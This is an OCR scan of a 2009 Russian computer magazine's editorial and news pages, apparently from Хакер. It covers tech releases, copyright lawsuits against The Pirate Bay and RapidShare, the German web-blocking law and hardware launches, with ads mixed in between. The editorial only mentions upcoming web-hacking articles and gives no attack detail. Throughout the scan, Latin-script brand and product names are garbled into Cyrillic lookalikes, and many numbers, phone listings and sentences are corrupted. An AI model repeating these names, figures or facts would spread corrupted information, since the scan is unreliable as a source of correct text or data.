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Общественность считает, что лето - это мертвый 
сезон. Типа, самое время бухать на даче и ехать на 
пляж в Египет, но не время учиться, работать и чего- 
то добиваться. Мне же эта позиция совершенно не 
близка. 

Лично для меня всегда все было наоборот. То ли бла- 
годаря оптимальному количеству солнца на улице, то 
ли благодаря возможности легко разбавлять работу 
тусовками, катанием на велике и пляжем, но факт 
остается фактом: именно летом мне очень комфортно 
работать и изучать что-то новое. 



К чему я это говорю? Да просто у нас получился 
термоядерный номер с кучей инфы, которую я тебе 
рекомендую впитать без остатка. Взять хотя бы тот 
факт, что РогЬ намутил для тебя сразу две крутые 
статьи о новых полуприватныхтехниках взлома, на- 
правленных в сторону ѵѵеЬ-хака. Будь внимателен: 
теперь даже старые, давно забытые слепые инъекции 
и нерабочие инклуды могутобрести новый смысл. 
пікі(022, главный редактор X 
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РасеЬоокМіе тоѵіе 



мэ 

О чем сегодня только не снимают кино, например, экранизации компьютерных игр 
уже стали нормой, и ты наверняка слышал о грядущем фильме по вселенной ѴѴогІсІ оі 
ѴѴагсгаІІ, то есть, в ход уже пошли даже мморпг. 

И вотеще одна новость пришла из Голливуда — не кто иной, какДэвид Финчер, автор 
таких лент как«Семь» (5е7еп), «Бойцовский клуб» (ГідЫ Сіи Ь) и «Чужой 3» (Аііеп 
3], собирается снятьфильм с говорящим названием «Социальная сеть» (ТЬеЗосіаІ 
ІЧеІѵѵогк]. Картина расскажет об одном из ярчайших стартапов последнихлет — 
социальной сети РасеЬоок. Похоже, на выходе планируется что-то в духе «Пиратов 
силиконовой долины» (долина на самом деле, конечно, кремниевая, но, «благодаря» 
переводчикам, фильм у нас известен именно под этим названием]. Из конкретики 
пока известно лишьто, что сценаристом картины выступает Аарон Соркин, среди 
продюсеров значится Кевин Спэйси, а съемки начнутся осенью этого года. 



(асеЬоок 



Почти 

«воздушный» ноутбук 



Инженерам всех компаний-производителей портативных ПК не дают покоя 
мысли о том, как бы сделать свои девайсы еще компактнее, легче и т.д. 
Очередную разработку в этой области — серию ноутбуков Х-зІіт — представила 
миру М5І. Модель М5І Х340 буквально создана для тех, кому по каким-то при- 
чинам «тесно» на железе нетбука, но, тем не менее, хочется компактности с 
сохранением неплохих мощностей. М5І Х340 это практически МасВоок Аіг на 
новый лад. При весе в 1 .32 кг машинка превышает толщину детища Арріе 
всего на 0.4 мм, может похвастаться съемным аккумулятором, экраном 13.4" 
(1366x768), процессором Іпіеі Соге 2 5о1о 113500 1.4 ГГц, 2 ГБ оперативной 
памяти, видео Іпіеі ОгарЫсз Мебіа Ассеіегаіог 4500МНО и жестким диском 
на 320 Гб. 

Весь «вторично-необходимый» набор 
также присутствует — веб-камера 
1.3 мегапикселя, порты 0-5иЬ, І_АІ\І 
и Н О М I , кардридер для 5Б и 5БНС, 
поддержка ѵѵі-іі 802.1 1 п и Віиеіооіб. 

Но самая занимательная составляю- 
щая новинки — цена, которую спе- 
циалистам М 51 удалось опустить до 
восьмисот с небольшим долларов. 

Также в линейку входят модели 
х320, х400 и хбОО — с диагоналями 
экранов 12, 14 и 1 5.4”. 




СПЕЦИАЛИСТЫ МСАРЕЕ РАПОРТУЮТ: САМЫЕ ОПАСНЫЕ ПОИСКОВЫЕ 
ЗАПРОСЫ, ЭТО «РВЕЕ» («БЕСПЛАТНО») И «МЫЗІС І.ѴВІС5» («ТЕКСТЫ ПЕСЕН»), 
20% ССЫЛОК ПО НИМ СОДЕРЖАТ МАЛВАРЬ. 
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А51І5 рекомендует ѴѴіпсІоѵѵз Ѵізіа® Ноте Ргетіит 



Свет. Композиция. Фокусировка. Работа фотографа заключается в том, чтобы запечатлеть красоту 
окружающего мира - так мерцающие блестки на поверхности ноутбука А51І8 11X50 напоминают о красоте 
звездного неба. Созданный на базе процессорной технологии ІпіеІ® Сепігіпо® 2 и оснащенный 
предустановленной подлинной ѴѴіпсІоѵѵз Ѵізіа® Ноте Ргетіит, АЗ 113 11X50 позволяет легко работать 
с фотографиями, а дискретная видеокарта ИѴЮІА® СеРогсе® С 105М (512 МВ) обеспечивает настолько 
чистые и яркие цвета, что вы словно возвращаетесь в место, запечатленное на фото. Система АІ Ыдііі 
автоматически изменяет уровень яркости дисплея и подсветки клавиатуры и тачпада в зависимости от 
внешнего освещения, позволяя просматривать и обрабатывать фотографии с максимальным 
комфортом. 

Новая серия АЗІІЗ 11X50 - оптимальный баланс формы и содержания. 

Всемирная гарантия 2 года ѵѵѵѵѵѵ.азиз.ги Горячая линия АЗІІЗ: (495) 23-11-999 

АЗУ54УОи (495) 585-80-45; Белый Ветер - ЦИФРОВОЙ (495) 730-30-30; СтартМастер (495) 785-85-55, (800) 555-8-555; РОЬАРІЗ (495) 755-55-57 
Москва: Сибиусс 721-86-40, ЮМ (495) 5-444-333, кибер[пеі] (495) 626-00-42, Берингов (495) 500-05-60, Нотик (495) 231-14-88, Респект (499) 177-40-77, ТРК 
(495) 739-08-28, ІІ5М (495) 775-82-02, Ф-Центр (495) 925-64-47, ИЕХУЗ (495) 628-23-67, ОШІ (495) 221-11-11 , ПИРИТ (495) 785-55-54, Мерлион (495) 981-84-84, ЕІко 
(495) 234-28-45, Пронет (495) 789-38-46, Юпитер (499) 271-83-50, ОСЗ (495) 995-25-75, (812) 324-28-70 

Санкт-Петербург: Цифры (812) 320-80-70, ИВСот (812) 329-70-00, Кей (812) 074, Компьютерный мир (812) 333-00-33, СТР Компьютере 
(812) 542-45-51; Владивосток: ДНО (4232) 300-454, В-Лазер (4232) 218-000; Воронеж: РЕТ (4732) 77-93-39; Екатеринбург: Буква (343) 22-22-025, Санрайз (343) 
261-39-15, Норд 8-800-2000-787; Ижевск: Корпорация «Центр» (3412) 91-88-11; Казань: Ноутбукофф (843) 264-26-01; Киров: Технополис (8332) 480-888; 
Краснодар: Владос (861) 210-10-01, Санрайз (861) 210-00-66; Красноярск: Аверс (3912) 560-561, Старком (3912) 49-11-11; Липецк: Регард-тур (4742) 220-555; 
Новосибирск: НЭТА (383) 216-33-11, Техносити (383) 212-53-33, Левел (383) 212-00-05, ГОТТИ (383) 362-00-44; Нижний Новгород: Алтэкс (831) 411-87-87; 
Норильск: Юрмала-М (3919) 46-73-36; Омск: РИТМ (3812) 23-64-00; Пермь: Ноутбукофф (342) 270-01-11, НоутовЪ (342) 210-10-84; Ростов-на-Дону: Санрайз 
(863) 240-11-77, Иманго (863) 232-47-18; Самара: Прагма (846) 270-17-01, Санрайз (846) 241-67-53, Сателлит (846) 224-00-00; Саратов: АТТО (8452) 444-111; 
Сургут: Компьютерный супермаркет «ПЕРВЫЙ» (3462) 247-000; Томск: Интант (3822) 56-00-56; Тюмень: Арсенал+ (3452) 797-070; Уфа: Кламас (347) 291-21-12, 
ФортеВД (347) 260-00-00; Чебоксары: Квартон (8352) 62-55-51 

Іпіеі, логотип ІпіеІ, Сепігіпо и Сепігіпо Іпзісіе являются товарными знаками корпорации ІпіеІ в США и других странах. 



Ноутбуки АЗІІЗ СЕРИИ 
Окрыляющая легкость. Сияние совершенства. 
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Мігапсіа 0.8 больше не альфа 



В свете последних не слишком светлых событий, развернувших- 
ся вокруг популярного мессенджера 01 Р, призывы переходить на 
Мігапсіа и вообще, юзать ЗаЬЬег, звучали по всему рунету, так что 
релиз новой версии Мігапсіа ІМ, можно сказать, произошел очень 
кстати. Ветка 0.8, что называется, «отправилась на золото» и на 
перечисление всех изменений можно потратить не одну страницу. 
Из наиболее заметных перемен:вІСО исправлен прием составных 
оффлайн сообщений и прием статусных сообщений в ІІТР8 от 01 Р, 



плюс, появилась поддержка статусных заметок и настроений; в 
ЗаЬЬег переработан и улучшен весь 1)1, добавилась поддержка новых 
расширений протокола (ХЕРы: 70, 83, 108, 147, 184, 224, 232 и т.д.), 
стало возможно хранить заметки на сервере (в приватном хранили- 
ще), и посылать чат-инвайты пользователям, находящимся стобой 
в одной комнате; в Ѵабоо появилась поддержка протокола Ѵабоо 
9.x. Помимо упомянутого, новая версия несет в себе еще множество 
самых разных исправлений и доработок. 



6 ИЮНЯ ВСЕМИ ЛЮБИМОМУ ДЕТИЩУ АЛ ЕКСЕЯ ПАЖИТНОВА — ТЕТРИСУ, 
ИСПОЛНИЛОСЬ 25 ЛЕТ. 



О 



Зародыш «Золотого щита»? 



Политикам всех стран, очевидно, очень нравится прокладывать дорогу 
для новых законов, стращая публику пугалом детского порно. Очередной 
яркий тому пример — Германия и госпожа Урсула фон дер Ляйен, феде- 
ральный министр по проблемам семьи. В этой, казалось бы, вполне евро- 
пейской и цивилизованной стране, по инициативе упомянутой Урсулы 
фон дер Ляйнен, приняли закон «О барьерах в интернете», который смот- 
релся бы уместно в Китае или Серверной Корее. Согласно ему, провайде- 
ров страны теперь обяжут показывать пользователям знак «5Т0Р!» при 
входе на сайты, значащиеся в черном списке федерального ведомства 
уголовной полиции. Последний будет пополняться ежедневно, и главный 
упор делается на контент с детской порнографией. Что интересно, 7 круп- 
нейших провайдеров страны уже согласились сотрудничать, а им, по раз- 
ным данным, принадлежит 90-95% рынка. Не менее интересно и то, что 
сайты из Ыаск ІізПа не будут закрывать, а их владельцев преследовать. 

Не тронут и юзеров, запросивших доступ к «запретному плоду». Более 
того, по некоторым данным, знак и вовсе будет лишь предупредительной 
мерой — попасть на запрашиваемый сайт все равно будет возможно, 
просто сделав повторный клик (и стараясь не думать о том, что «Большой 
брат» все видит). Но, как бы то ни было, факт остается фактом — закон 
принят, невзирая на самую большую в истории ФРГ гражданскую пети- 
цию (более 130.000 подписавшихся), а все недовольство общественности 
осталось «незамеченным» печатными СМИ и крупными телеканалами. 




А космос все ближе и ближе 




Вот сидим мы здесь и ничего не знаем, а тем временем в США 
19-го июня начато строительство первого в мире космопор- 
та — Бра серого Атегіса. Сооружение воздвигнут на юге шта- 
та Нью-Мексико и на его постройку уйдет порядка 200 млн. 
долларов. Самое интересное, что космопорт будет не военным 
объектом, — он будет функционировать как обычный аэродром, и 
с него в космос будут летать люди, которые в состоянии себе это 
позволить. Таких уже нашлось более 250 человек, и каждый их 
них раскошелился на $200.000. Сама постройка при этом будет 
собственностью государства, а вот ракетоноситель, космичес- 
кий аппарат и все технологии принадлежат компании Ѵігдіп 
ЭаІасБс. В будущем планируется, что космические перелеты 
будут осуществляться как внутри США — до Техаса, Флориды 
или Оклахомы, так и во «внешний мир», в частности, в север- 
ную Швецию. Первые рейсы уже назначены на декабрь 2010 
года, хотя строительство полностью закончится только к 201 4. 
Подобный перелет будет занимать два часа, 5 минут из которых 
пассажиры проведут в невесомости. 
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ьудьте всегда 

в выигрышном положении 



Зеркальная фотокамера 05000 с уникальным поворотным 
дисплеем и функцией съемки видео в формате НО. 
Новая модель - новые перспективы. 



Основа изображения 



Благодаря уникальному 2,7-дюймовому ЖК-экрану 
с переменным углом наклона Вы сможете легко 
фотографировать из любого положенин. 

12 г 3 мегапикселя и система обработки изображений 
ЕХРЕЕО позволяют получать фотоснимки с высоким 
разрешением, функция записи видеоклипов в формате НО 
дает простор для творчества. С помощью фотокамеры 05000 
Вы всегда будете в выигрышном положении и сможете 
запечатлеть то, что раньше казалось невозможным. 



** * 



Требуйте наличия 
4 голографической наклейки 
на гарантийном талоне! 



ѵтѵѵ.пікоп.ги Телефон горячей линии: (495) 733-9170 



* Запись **Икспид *** 50 лет байонета эф 



Реклама. Товар сертифицирован 
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Копирайт-войны 

продолжаются 

Админы трекера ТЬе Рігаіе Вау, признанные виновными в ходе недавнего судебного разбира- 
тельства, не сдаются. Хотя судью Томаса Нурстрема не удалось признать предвзятым лицом 
(напомним, что уже после вынесения приговора, выяснилось, что судья имеет прямое отноше- 
ние сразу к трем анти пиратским организациям], и ТРВ теперь подает иск в Европейский суд по 
правам человека на все государство Швеция. Дело в том, что судья Ульрика Ирфельт, рассмат- 
ривавшая вопрос Нурдстрема, оказалась ничуть не лучше своего коллеги — онатоже плотно 
связана сзащитниками копирайтов. 

Атем временем в СШАсуд приговорил 32-летнюю мать четверых детей Джеми Томас-Рассет к 
штрафу в размере 1 .92 млн. долларов, за распространение 24 музыкальныхтреков в сети Кагаа. 
Пока представители РІАА и отдельно взятых медиа-гиагантов радовались, называя вердикт 
«высшим проявлением справедливости», в Сети все громче звучали диаметрально противо- 
положные высказывания. Что особенно радует — к противникам таких мер присоединяется все 
больше известных личностей, например, очень негативно высказался у себя в блоге всемирно 
известный музыкант Мобу. Его осуждение коснулось не только упомянутого решения суда, но и 
всей системы авторских прав в еетекущем виде, многочисленных исков и чудовищных много- 
миллионных штрафов. 




СТАЛА ИЗВЕСТНА ОФИЦИАЛЬНАЯ ДАТА РЕЛИЗА ѴѴШБОѴѴБ 7 — 22 ОКТЯБРЯ 
-О 2009 ГОДА. В РОССИИ НОВАЯ ОС ВЫЙДЕТ В ЭТОТЖЕ ДЕНЬ. 




128 Гб, кто больше? 

Емкость портативных накопителей информации все увеличивается и увеличивается, и вотподоспел 
новый рекорд — компания Кіпдзіоп анонсировала первую в мире флешку объемом 128 Гб. Девайс по 
имени ОаІаТгаѵеІег200 будет распространяться только по предварительным заказам, и его цена соста- 
вит$546. В серию войдут три вариации емкостью 32, 64 и 128 Гб соответственно, которыетакже будут 
различаться по цвету — синий, желтый и черный. Цена младших моделей линии составит 213 и 120 
долларов. Помимо прочего, флешки будут оснащены парольной системой защиты данных Раззѵѵогб 
Тгаѵеіеги поддержкой ѴѴіп б оѵѵз РеабуВоозГ 



Нетбук, 
нетбук, нетбук 

История, о которой мы уже не раз писали, раз- 
решилась миром. Компания Рзіоп, владевшая 
правами на торговую марку «пеібоок» (так 
назывался один из продуктов Рзіоп], наконец, 
разрешила миру спокойно пользоваться этим 
словом. Напомним, что ранее представители 
Рзіоп грозились засудить всех, от производи- 
телей до журналистов, за такое фривольное 
обращение с их за регистрирован ной торговой 
маркой. Теперь же копаниями Рзіоп и Іпіеі под- 
писаны бумаги, согласно которым Рзіоп добро- 
вольно отказалась от своих прав на «пеіЬоок» 
и более не владеет данной торговой маркой. 

Условия, на которых удалось достичь консенсу- 
са, не разглашаются, нотеперьони нестольуж 
и важны. Троекратное нетбук, нетбук, нетбук! 
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Полное 

тестирование 

заказанной 

конфигурации 



Мощный. 

Эффективный 



Антикризисные серверные решения 



Хеоп 

іпзідё 



Для малого 



Р-5*уІе® МагзНаІІ® МР 

Однопроцессорные серверы 
на базе процессоров Іпіеі® Хеоп® 



Р-5*уІе® МагзНаІІ® МР 

Универсальные двух 
и четырехпроцессорные серверы 
на базе процессоров Іпіеі® Хеоп® 



Благодаря высочайшей производительности четырехъядерных процессоров Іпіеі® Хеоп® 
и традиционному качеству Р-ЗІуІе, один сервер Р-ЗІуІе® МагзНаІІ® выполнит 
сегодня те задачи, для решения которых раньше требовалась мощь нескольких 
высокопроизводительных серверов. 



Бесплатные консультации и подбор конфигураций 



За консультацией и по вопросам приобретения 
обращайтесь к нашим партнерам. Полный список 
партнеров на сайте: ѵѵѵѵѵѵ.г-зіуіе-сотриіегз.ги 



Техническая поддержка: 

ЗАО «Эр-Стайл Компьютере» Тел.: (495) 514-14-17 
Бесплатный телефон: 8-800-200-800-7 



К-5іуІе® МагзГіаІІ® 
ЗГогтЫасІе 

Серверы модульной архитектуры 
на базе процессоров Іпіеі® Хеоп® 



К- 8(у1е 

СОМРІІТЕГСЗ 



Корпорация Іпіеі не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений относительно 
конкретных компьютерных систем, упоминание о которых содержится в данном документе. 



©2009 г, Сеіегоп, Сеіегоп Іпзісіе, СепНіпо, СепТгіпо Іпзібе, логотип СепТгіпо, Соге ІпБібе, логотип ІпТеІ, ІпТеІ, ІпТеІ Соге, ІпТеІ Іпзібе, логотип ІпТеІ Іпзібе, ІпТеІ Ѵііѵ, ІпТеІ ѵРго, ІТапіит, ІТапіит Іпзібе, 
Репбііт, Репііит Іпзісіе, Ѵііѵ ІпБІсІе, ѵРго Іпзісіе, Хеоп, и Хеоп ІпБІсІе являются товарными знаками права на которые принадлежат корпорации ІпТеІ на территории США и других стран. 
Все права защищены, Реклама. 
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Чистки на КарісІБНаге 



Еще одно очко в противостоянии 
правообладателей с пиратами 
ушло в копилку первых. На этот 
раз безрадостные известия посту- 
пили из Германии, где файловый 
хостинг На рібЗЬаге проиграл су- 
дебное разбирательство. Гамбург- 
ский районный суд постановил, 
что «Рапида» обязуется убрать из 
сети порядка 5000 музыкальных 
треков. То есть, суд фактичес- 
ки признал, что хостинг несет 
ответственность за хранящийся 
у него контент, удовлетворив 
тем самым претензии немец- 
кого общества сбора авторских 
отчислений СЕМА. СЕМА — своего 
рода местная МРАА от музыки, они 



представляют интересы 60.000 ав- 
торов, композиторов и различных 
музыкальных лейблов. В итоге, 
получается, что теперь правооб- 
ладателям нет нужды доказывать, 
что выложенные в широкий доступ 
материалы являются контрафак- 
том и проверять их на легальность, 
хостер должен следить за этим 
самостоятельно. РарісІСЬаге и 
ранее исправно убирал «крими- 
нальные» файлы потребованию 
владельцев копирайтов, нотеперь 
весь контроль переложили на 
плечи самого хостера. 

В случаеже несоблюдения правил 
последуют новые суды и уже 
штрафы. 



Главное, 
о не свернуть 
себе шею 



Компания Ыес, похоже, решила шокировать публику, а геймеров и дизай- 
неров ввести в состояние истерики и экстаза. Что и говорить, им удалось 
ито и другое — монитор ІЧЕС СВѴ43 не та вещь, к которой можно остаться 
равнодушным. Аббревиатура названия происходит от слова «сигѵесі» — 
«изогнутый» и это чистая правда: 43" диагонали действительно загибают- 
ся в сторону сидящего, образуя настоящую панораму. Но гигантский экран 
радует нетолько размерами, но и характеристиками: разрешение 2880x900 
пикселей, время отклика 0.02 мс, яркость 200 кд/м, контрастность 10000:1 , 
100% покрытие цветового охвата зВСВ и 99.3% покрытие АбоЬе ВСВ. 
Имеются также интерфейсы ОѴІ-О и НИМ1 1 .3 и 115В 2.0 порт. По сути, минус 
у этого монитора только один, зато очень внушительный — цена, которая 
составит $8000. Надеемся, что поклонники авиасимов смогли дочитать эту 
новость до конца и остаться живы :). 




ІО»* 1 



Ном у«мг ІІМ Ьг РКЕЕ аі Карм)$Каг* сот) 

1 5*І»сі №• алй сііск |Ь« ЫрІов<) ЬиПол 

2 5Ьіг* Оомпіом) I»* 

3 ѴоисалмттоМомалуити 




ПО ДАННЫМ СІ5С0 5У5ТЕМ, ПОСЛЕ ЗАКРЫТИЯ ИНТЕРНЕТ-ПРОВАЙДЕРА 
РШСЕѴѴЕКТ, СОТРУДНИЧАВШЕГО СО СПАМЕРАМИ И ХАКЕРАМИ, ОБЪЕМ 
СПАМА В СЕТИ УПАЛ НА 3 0 %. 



Кина не будет, ІпІегЛІт закрывают 



Сторрент-трекерами активно 
борются отнюдь не только в Европе 
и США. Нашимтрекерам и их вла- 
дельцам тоже живется несладко. 
Так, в начале июня стало известно, 
что владелец іпІегПт.ги . его жена 
и еще ряд сотрудников, по мнению 
органов, стоявших во главе пи- 
ратской студии Риг-Кагаріщ были 
задержаны в ходе первого в России рейда, направленного против пират- 
ского сайта. Провели рейд управление «К» и следственный комитет МВД 
РФ. Детали дела пока не афишируются, но сообщается, что доказательст- 



ва управление «К» собирало полтора года, а ущерб, нанесенный право- 
обладателям, оценивается примерно в пять миллионов рублей. Трекер, 
по официальным данным, прикрыли одновременно с задержанием 
руководства, невзирая на то, что хостился он у нидерландского провайде- 
ра ЕеазеѵѵеЬ — голландцы оказали нашим правоохранительным органам 
содействие. На дележе, на моментнаписания этой новости он с перемен- 
ным успехом продолжал работать. Свою роль во всей этой истории явно 
сыграл и тот фа кт, что Іпіегбіт нетолько распространял контрафакт, но и 
буквально порождал его — помимо прочего, в деле фигурируют съемка 
членами команды іпіегбіт.ги экраноки ихсвязи с пиратскими группами 
из других стран. Задержанным хозяевам ресурса теперь грозит до шести 
леттюрьмы и штраф в размере до 500.000 рублей. 
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Они прошли 
в парламент 

Пиратская партия Швеции, на волне шумихи вокругТЬе Рігаіе Вау, набрала на 
прошедших выборах порядка 7.1% голосов и получила одно место в Европарламен- 
те. Сказать, что это серьезный прогресс и достижение, значит не сказать ничего. 
Наконец-то борцы с копирайтом получили право голоса, и лишний раз доказали, что 
за отмену авторских прав могут выступать нетолько безликие «анонимы из интерне- 
тов», но и грамотные, адекватные люди. Представлять Пиратскую партию в Брюсселе 
будет Кристиан Энгстрем.таккакон наиболее подкован в этих вопросах — ранее 
выступал против программных патентов. Кстати, сходные с Пиратской партией цели 
собирается преследовать и шведская партия зеленых, в которой состоит один из 
админов ТРВ — Питер Сунде. «Зеленые», в свою очередь, набрали 10.9% голосов и 
получили в парламенте два места. 



| -о 




КОМПАНИЯ Е5ЕТ ПОДСЧИТАЛА, ЧТО ЧЕРВЬ СОМРІСКЕК ПРОДОЛЖАЕТ 
ЛИДИРОВАТЬ В РОССИЙСКОМ СЕГМЕНТЕ ПО КОЛИЧЕСТВУ ЗАРАЖЕНИЙ. 
НА ЕГО СЧЕТУ 2 1 . 26 % МАШИН. 



іРНопе ускоряется 



Арріе никогда не стоит на месте, и пока по сети циркулируют 
слухи, что компания готовит выпуск планшетного ПК, уже 
существующие продукты тоже не остаются без внимания. На 
ѴѴѴѴБС 2009 Арріе представила новый іРбопе 305, где буква 
«в» означает«5реесІ». Изменений в аппарате оказалось 
совсем не так много, как хотелось бы, и в ряд л и многие 
поспешат менять свой іРбопе на новый. Перечислим 
избранное: приложения теперьзапускаются в 2.1 раза быст- 
рее, а загрузка веб-страницускорилась в среднем в 3 раза; 
сменилась камера, теперь внутри прячется 3 Мрх с автофо- 
кусом, выдержкой, балансом белого и функцией макросъем- 
ки; появилась поддержка стандарта связи 7.2 МЬрз Н50РА; 
добавиласьаппаратная поддержка 0реп6І_|Е5; и, наконец, 
поя вилось управление голосом, и было оптимизировано 
время работы девайса. В продаже іРбопе 305 появится уже 
в конце лета — в июле в 0ША, в августеу нас. Цена новинки 
составит$199за модель с 16 Гб памяти и $299 за модель с 32 
Гб памяти. 



МИРОВЫМ ЛИДЕРОМ В ОБЛАСТИ 
ЗАЩИТНОГО ПО ОСТАЕТСЯ 5ѴМАЫТЕС. 
ЕГО ДОЛЯ РЫНКА В ПРОШЛОМ ГОДУ 

ДОСТИГЛА 22 %. 



«Безопасный» сайт 




По адресу ЗесигеІізГги недавно открылся новый инфор- 
мационный проект «Лаборатории Касперского». По сути, 
указанный сайт является русской версией давно существу- 
ющего 5есигеІІ5Гсот. 

Здесьтакже можно найти аналитические публикации, 
веблог, энциклопедию по информационной безопаснос- 
ти, описание детектируемых объектов, а также глоссарий. 
Главным редактором ресурса стал Александр Гостев, ру- 
ководитель Центра глобальных исследований и анализа 
угроз Казрегзку Баб. 

Байты ѴігизІізГги и ЗраітЛезГги, в свою очередь, были 
закрыты, так кактеперь они тоже являются частью 
нового портала. К фишкам сайта можно отнести веблог 
с системой рейтингов, наполнять который могут все 
посетители ресурса, а также систему автоматическо- 
го создания описаний функционала детектируемых 
объектов. 
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НА РЕСУРСЕ НН.РІІ ПОДЧИТАЛИ, ЧТО ІТ-ШНИКИ МАТЕРЯТСЯ ДАЖЕ ЧАЩЕ, ЧЕМ 
СТРОИТЕЛИ И ПРОДАВЦЫ. НЕЦЕНЗУРЩИНУ МОЖНО УСЛЫШАТЬ В 50 и 05 % 
ІТ-ФИРМ. 



Орега Ііпііе — веб-сервер в браузере 



Орага ЦпНі Сагѵісаі * 
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Новая технология Орега Ііпііе от компании Орега ЗоіТѵѵаге, по 
мнению ее создателей, «меняет представление об интернете, как 
о клиент-серверной модели обмена информацией», ведь благо- 
даря ей любой компьютер можетлегко превратиться в сервер. 
Дело в том, что в Орега, каки во многих других компаниях, считают 
облачные вычисления очень перспективной штукой, но вотто, 



что при этом приходится предоставлять свою 
информацию третьей стороне — серверам 
веб-приложений, специалистам Орега было не 
по душе. Так и появился Ііпііе, скачав который 
с ІаЬв.орега.сот и установив, юзер получает 
доступ к сервисам, работающим прямоунего 
браузере. Пока их всего шесть — «веб-сервер», 
с помощью которого можно поднять свой сайт, 
просто расшарив на харде папку с файлами 
сайта. «Доступ к файлам», чье название говорит 
само за себя — просто выбери нужные файлы и 
открой к ним доступ. «Медиа-проигрыватель», 
который предоставит тебе доступ к расшарен- 
ной на твоей машине музыке с любого другого 
ПК. «Доступ к фото» позволит поделиться 
фотографиями с друзьями, незаливая их на сто- 
ронние хостинги (для этого опять же потребует- 
ся только расшарить на жестком диске нужную 
папку, а приложение уже сформирует галерею 
миниатюр). В «Гостиной» можно устроить чат 
безо всяких процедур регистрации. И, наконец, 
— * - г - можно поразвлечься, прикрепляя записки к 

виртуальному «Холодильнику». Да, все сервисы 
будут работать, только пока твой компьютер включен, и, тем не 
менее, это удобно и актуально. Особенно ІІпіІе, конечно, оценят 
казуалы, которые врядлизнаюткак, кпримеру, поднять собствен- 
ный фтп-серевер, однако технология должна понравиться и тем, 
кому надоело зависеть от файловых, - фото- и так далее хости н го в, 
и людям, предпочитающим простые и удобные решения. 




мире видео 



ѴісІсяМаІе 

ТѴ воМ РІив II 

• Аналоговый ТВ-тюнер с 
интерфейсом РСІ 
« • * * • Запись по расписанию с 
включением компьютера 



1/ігсГе* Маіе 

Ѵізіа Ц 890 Р 



Мюгозой разрешение 



ѴігіетМаіе 

Ѵ 300 



Автономный ТВ-тюнер 
Поддержка разрешения 
монитора до 1680x1050 
и НОТУ входа до 1080 і 



Миниатюрный ЦІЗВ 2.0 
аналоговый ТВ-тюнер 
С ГМ -при ем ником 
Функция РІР/РОР для 
просмотра ТВ и 
записанного видео 



Ищите подходящий Вашим запросам ТВ-тюнер а ближайшем магазине наших партнеров! 

* Москва - ОДДИ (495 1 22 1 -1 1 11 ■ Москва - Эл-одорадо И 56* 500-3390 ■ Челябинск - ФОрТ-алекТроникс (35 1 ) 262-5577 - Астралам 525 (5512} 40 М00 ■ СанП-ПетврбурГ - КЕИ 16і2) 231 -2464 

■ Москва - МИР (495) 7ККККЮ ■ Ниной Новгород - КрыпАС 1«Ш) 720-720 ■ ЙиищрнОпэ - КД Алгржад (6362) 4 1 0-51 1 ■ Краснодар - Иманго (06 1 ) 251-091 3 ■ Свнг-Лвт*рбург - Цифр* («12) Э2О-0ОѲО 

■ Мдаиэ - Текнмипі {495) 777-6777 ■ Тамбов ■ Комдив (4752} 72ѲЧН9 ■ Владивосток . А1 1 (4232) 205-020 ■ Краснодар - Синрэйэ {«61} 2 1 0-0066 ■ Сдамт-Летербург - Кнпьѵгерннй Мир 1612} ЗЭЗ-ОСШ 

- Москва - МТ Сотрчівг (495) 363-9393 - Калуга - Апгрейд 14642) 576*270 ■ Ярославль * Зпѳктрония (4Й52) 755-ОГО * Кмму&мецк - Эврмюѵ-Крэбасс (3642) 53-74*36 - Набережные Челны ■ АККОМ (0562} 392-4Ѳ2 

• Москва - Роіагга (495) 755-555? - Воронеж - РЁТ (4732) 259-239 - Смоленск - Экопері (401 2) 250-990 - Саранок - НПЦ -ДЭЛК* (6242) 475-761 - Киров - Тѵкпром ($232) 364-017 

■ Мддаа - Аіщн (405) 991-4997 ■ Новосибирск - Л» л (363} 212-0005 ■ Пенза - Терминал (64 12} 544-290 ■ Биробиджан - Компания НИТ (42622) 4-79-79 ■ Сарате* - Фирма АТТО (0452} 444- 1 44 
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" Ябблоки 
без червяков 

Еще в начале года стало известно, что российские спе- 
цы в области информационной защиты готовят версии 
своих продуктов для Мае 05Х. И хотя маководов в руне- 
те насчитывается всего порядка 0.4-0. 5%, «ябблочные» 
вирусы в последнее время перестали быть большой 
редкостью — уже даже появились Арріе-ботнеты. Но 
теперь владельцы «Маков» могутспать спокойно, 
компания Доктор Веб завершила бета-тестирование 
Ог.ѴѴеЬ для Мае 05 X и выпустила его в продажу. 

Новинка представляет собой современный антивирус, 
со всеми причитающимися ему «плюшками» - ми- 
нимальная нагрузка на систему, защита в режиме 
реального времени, быстрое сканирование машины на 
наличие малваря, минимальный расход трафика при 
обновлениях, и, конечно, Ог.ѴѴеЬ для Мае 05 X может 
похвастаться стильным, русским интерфейсом под Мае. 
Приобрести новинку можно в виде электронной лицен- 
зии (отдельно, или в составе Ог.ѴѴеЬ 5еси гіЕу 5расе]. 



Контроллер больше 
не нужен 




■Ййй. 



Ог.ѴѴЕВ 

Антивирус 






ЗА ПОСЛЕДНИЕ ПОЛГОДА 
КОЛИЧЕСТВО ЗАГРУЗОК ВИДЕО 
НАѴОІЛІШЕ С МОБИЛЬНЫХ 
ТЕЛЕФОНОВ ВЫРОСЛО НА 

1700 %. 



На прошедшей в США конференции ЕЗ 
компания Місгозоіі: представила публике 
свой революционный проект для Х-Вох 
360 — Ыаіаі. Рекламные рол ики техноло- 
гии, записьее презентации и впечатления 
очевидцев поражают воображение. Хотя 
мыв последнее время частенько слышим 
фразу «будущее уже здесь», она редко она 
бывает настолько уместна, как в данном 
случае. Полное взаимодействие с консо- 
лью без каких-либо контроллеров уже не 
фантастика — манипулятором теперь мо- 
жет выступать сам игрок, его тело и голос. 
Все, что для этого потребуется — просто 
встать перед камерой\телевизором. Ника- 
ких датчиков нателе и спец, приспособле- 



ний в руках, а в виртуальном мире можно 
будет даже увидеть свое отражение в 
воде. Да, прыгать, махать ногами и руками 
придется еще больше, чем при игре на 
N іпііепсіо ѴѴіі, но помимо игр можно, напри- 
мер, полистать списокфильмов простым 
взмахом руки, делая это почти также круто, 
какТом Круз в «Особом мнении». Ауж 
какие горизонты открываются для адалт 
индустрии, и вовсе страшно подумать. 

Но Ыаіаі как раз тот случай, когда лучше 
один раз увидеть, чем сто раз услышать и 
прочитать, поэтому советуем тебе зайти на 
официальный сайт Х-Вох [ ЬНр:// 
сот ), или же вбить в поисковую строку на 
ѴоиТиЬе: «ЫаіаІХЬохЗбО». 



ТѵѵіНег скоро 
заговорит по-русски 




Безумно популярный сервис для микро- 
